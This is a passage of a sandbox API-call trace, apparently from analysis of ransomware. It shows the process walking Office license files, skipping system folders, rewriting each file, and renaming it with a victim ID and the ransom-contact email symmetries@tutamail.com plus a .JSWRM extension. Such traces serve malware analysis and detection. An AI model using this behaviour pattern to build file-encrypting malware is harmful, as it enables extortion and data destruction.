lpWideCharStr="MondoR_Subscription-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0104.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0104.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.102] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=32361) returned 1 [0104.102] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e60) returned 0x24c1d0 [0104.102] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x7e60, lpOverlapped=0x0) returned 1 [0104.106] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.106] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x7e60, lpOverlapped=0x0) returned 1 [0104.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.106] CloseHandle (hObject=0x45c) returned 1 [0104.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0104.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0104.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0104.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0104.108] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4cd3aa8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4cd3aa8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4e04d8b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Subscription-ul-oob.xrm-ms", cAlternateFileName="MOD85A~1.XRM")) returned 1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.108] lstrcmpiW (lpString1="MondoR_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0104.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.109] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11612) returned 1 [0104.109] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0104.109] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0104.121] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.121] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0104.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.121] CloseHandle (hObject=0x45c) returned 1 [0104.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0104.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0104.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0104.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0104.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0104.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.123] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4c6135d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4c6135d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4d461ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Subscription2-pl.xrm-ms", cAlternateFileName="MOE696~1.XRM")) returned 1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2=".") returned 1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="..") returned 1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="...") returned 1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="windows") returned -1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="recovery") returned -1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.123] lstrcmpiW (lpString1="MondoR_Subscription2-pl.xrm-ms", lpString2="msocache") returned -1 [0104.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0104.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0104.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0104.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.124] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11171) returned 1 [0104.124] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.124] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.127] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.127] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.127] CloseHandle (hObject=0x45c) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0104.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0104.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0104.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0104.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0104.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0104.128] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4cd3aa8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4cd3aa8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4ddeb2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7e6a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Subscription2-ppd.xrm-ms", cAlternateFileName="MOD3B0~1.XRM")) returned 1 [0104.128] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2=".") returned 1 [0104.128] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="..") returned 1 [0104.128] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="...") returned 1 [0104.128] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="windows") returned -1 [0104.128] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.129] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.129] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.129] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.129] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.129] lstrcmpiW (lpString1="MondoR_Subscription2-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0104.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0104.129] 